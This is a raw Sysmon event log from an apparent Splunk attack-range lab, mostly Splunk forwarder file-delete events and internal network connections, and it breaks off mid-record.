23542300x8000000000000000215871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:22.960{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52727C33FDC52F0CB964657CB288485A,SHA256=FD6540E1D936850293D27174BD97BE8A5DC942AD20FA281221175B42E47302FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:22.076{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713EE6BA643EDF8248B74DCDCE2F176D,SHA256=B74329D0C20FAC754151F0F35C8A25ADF3B6FB1BA72E383E7B2645401AE8E06D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:23.976{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EC436F622DA5AF959F602CD0DB3BE6B,SHA256=027350846731D28752E503A8A0D9B195C48B6D50FF0A40B78265B85918B89C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:23.092{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7015390B023B5382218972887B891895,SHA256=7EEB9390CE69E6EBD3E5FC86EF68258618B9B12DFE66578D19BE8C04EEED9E84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:24.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2B09A44F3710635C008FB576724A85,SHA256=DB05B320335CF5977837FA95014B7BE99DC60D9603304F6CFDFBAD1A6C149876,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:22.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51287-false10.0.1.12-8000- 23542300x8000000000000000286971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:24.092{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E33873F8651EC4EEC46B183CB8CE422,SHA256=F347A11EC916CB3B4A9024529F0B88D7A940B86809ED48D142F62B979D61F0A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:25.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963842FA846D2681DCFBEBB8E28B75A6,SHA256=982227DE577688CBC65CD55A5D269C605B83CF76E08F44811FE3EBE4D7372D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:25.092{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E944157AA7C5A63C0D697A05D3354C,SHA256=71E678846762DCD1567588E9A261686ACA6EE1C26A8CD8AE8EE5539ADCF3025C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:26.170{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8B7586BB51A66F012F0BC3318EF795,SHA256=A540654FBCC9E2FEFFBBD7F567EFAC18A7CC2CD852875972777785916BFA46A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:27.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BF311A969E0FA9131042782C9858CC4,SHA256=4976FECECA5577531B629B32154F85BD3B78B40ED7E30762D4230F09F0002412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:27.186{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D80A97548CB468BA130CBD343218A758,SHA256=A70E47D4C095EF80110C1BCEBEA054A8B7F324115CFA5F3CF80F37B18CC60D07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:23.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:28.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42010E002AFC39E2A1FB26B0D2EAFEBC,SHA256=7666EDED0E1FB3DF7D0FD06EE8F8B8942A7CDCBD277994DFF688DC07CCE54B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:28.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AD44553D0BB84C7F34179E288EFA4E5,SHA256=2B29B62E12716173ED2D42CED1D2277B17CA159B3353A9E88BA9A93B8299B009,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:29.248{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EDEA08822C665E7B98C463A21E96B77,SHA256=887B0BC46B7F325BD9BA9EE1B1D5A7F592055F1FC95B6AE253D56321603E279F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:27.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51288-false10.0.1.12-8000- 23542300x8000000000000000215878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:29.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007A08F92FA7266B83EE5F015C99B3A1,SHA256=003E273F789D3EBCC204EF4D698A75DE74E0598B5D09452A73D9B2DDE4E12B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:30.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECCE0D781C7DCF9F03FFCE04F4B70642,SHA256=94DC5B913971279F31BF5C75667F5D8B9D5465D12EA816CB42A367D585CB013A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:30.272{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5BD6BE12C8DBFEF23E36AD908EB3B315,SHA256=257359285DA31D68E46DE87A1CB913122E024A940FD61E09685B9E726CEB505D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:30.038{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7EF1FDC1DCF1F3564ABE8686DF3AA27,SHA256=7FB459FFD8E1D29AA2A9CD360377DDE53BD38E8E995F569EEBC358068FB7D5F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:31.373{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06410D9562013350549079593FF8BAC8,SHA256=229CD5DA4DF3CE98AD6ADE68087258025D184F3B9D322DCF5743829D7959F301,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:31.054{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C8B195798C4C4D0657ACE9DB7D83061,SHA256=5DA8303D63C74796675E7FFAA93DA61DF80BE9B3E34C8BE06C1757371BA9DD17,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:28.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53375-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:32.545{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0F1280FC229AF2CF55FAC4ABD606090,SHA256=CB41B07F702357D89854B2D216C7E1C662F57D00ECBF613DA4B4D0AD3D650ECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:32.054{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCAB77D56FEAF26C4EA023314D25A285,SHA256=82B3254A60CA88209162263730E58F3E2393F6B35D0CB30A04905AA84DD684DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:33.576{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FE957BBCEBDEC89D670028AC2BFEC0,SHA256=C9451E3D6969320A4E9AF4F11E7BBC7916373DD79C2EFD7D5AEFFB50F92BEF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:33.054{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF6F3CF43C40887590EA57B6487169C7,SHA256=8A59A8FF7F8D0C5E9CDE9D67DD326503ADFA58D1979B3BF741345BCD07514A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:33.326{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E32CB729E0C7C0F5255267ECB189E4EE,SHA256=DB5C180CE98B2B76C906CFBEA16C1FAF707B0FD40EE329E59279C3BBDAE6C179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:34.701{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE83F16DE030B12EB14F1BE09D19EAD,SHA256=AFA8E12560D0EE9D6B67C015D48BB245EFB8B24673D10292B608B9FAE371697B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:34.288{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577BF3AB3C9F899036B9C1C4B9A9AD64,SHA256=3C9185F127FB01036A4F2B04FED4B8B43B431471FFBE22B192307B0FD6F5D95F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:33.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51289-false10.0.1.12-8000- 23542300x8000000000000000215886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:35.507{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DEA65D6FAE02C6C81E541D2AE47F46B,SHA256=12804148BACDF134522665644489F2573259AAFBB3EECAB30DCF93C07191B179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:35.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D1978E9CD66731B83A17A3DDA97FC57,SHA256=5E27AD18FAB6C55253A66EF80F90D19A4BAAEF55D781CB636D003AC4D46F9491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:36.522{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20736C5B83EB70D85941219497119638,SHA256=E64DADABC0437805BF085D2710085AD9C9D35BD1170BC897BC4FA29278164D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:36.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D10D09DCB4367B4522CF2F7E3CE33227,SHA256=720A3ADB065F95A96CEECC156349AC6192B4D13E8FA590B4F75879A922B06D85,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:34.487{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53376-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:37.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3EF693383946CB62DB77B38281C5097,SHA256=49812DE61E95C6E0C642EA97BB68F93D08CC732B679ED35EFB00EC077C255692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:37.569{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADFDF69BB3809E3B9C30B6C761A1EF13,SHA256=A3B5D3E3A05C6074827465B685652ED349CBCB114569B123CFFC30B2C1DAD83A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:38.842{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46221D290CC090DFD0D2CF93C76D0BAF,SHA256=ABB39E31035567210A203695B85D844DC91B9880EA2AB0AA24A1DA651811FC14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:38.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B1D7D846A8F7D05E22D83AC2F519DC5,SHA256=2153FD309A6DE7EADD6A47B6FAE849037F3CEF429B33130BA81503C32AC2556E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:39.889{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F499E109F4417E0F91D6FE934854C3DB,SHA256=2187FC96BEA5E9998672C544E91C35E2346B1B48BB79C9D332A5B9A0C3B85312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:39.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6F54D78FB8E3A302353D2415E2A94F2,SHA256=A9C2ED4C11FD2EA7AB34B785BCCA878735F6964BC1AB201F58379F0383BAD4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:39.701{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:40.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD840802FCAC5C8B89239322EB40F73,SHA256=BE2BA328030ED3AAC628F7D722E2155A3C2DDCB385178903B3E98BDC00CEBBFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:40.904{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9508BC98A07A2717C3FF735BF460F83,SHA256=B6A6DC9E1ECE244621D236757AE2B12F930676132C7C40879B9DF74532387D26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:40.717{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:41.929{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42D15FE02D3398815B9F0A2E6BA18B30,SHA256=A8E3FF092CCA56D44CA26FC8B218D16D58FFE13575ED452097687AB3E5095F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:41.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA93E2E57CFD30E37E2027C4EF26A64,SHA256=B65C1DFCC57F29404683DE5FD0EB465668E387434739FBCB42173F50325F6DB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:39.159{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53377-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000286997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:42.967{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 